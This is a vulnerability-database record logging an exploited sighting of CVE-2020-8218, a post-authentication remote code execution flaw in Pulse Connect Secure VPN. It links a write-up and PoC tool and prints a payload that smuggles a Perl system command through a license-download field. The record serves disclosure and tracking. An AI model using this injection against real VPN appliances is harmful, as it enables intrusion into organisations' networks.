{"uuid": "eff82c48-059a-4823-a851-ce2f3c2d461b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-8218", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1660", "content": "CVE-2020-8218:\nPulse Connect Secure SSL VPN (ver. 9.1R7) - Post-auth RCE (PoC)\nhttps://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/\nPoC tool to test for the existence of Pulse Secure RCE:\nhttps://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py\nPoC:\n/dana-admin/license/downloadlicenses.cgi?cmd=download&txtVLSAuthCode=whatever -n '($x=\"ls /\",system$x); #' -e /data/runtime/tmp/tt/setcookie.thtml.ttc", "creation_timestamp": "2020-09-03T03:31:18.000000Z"}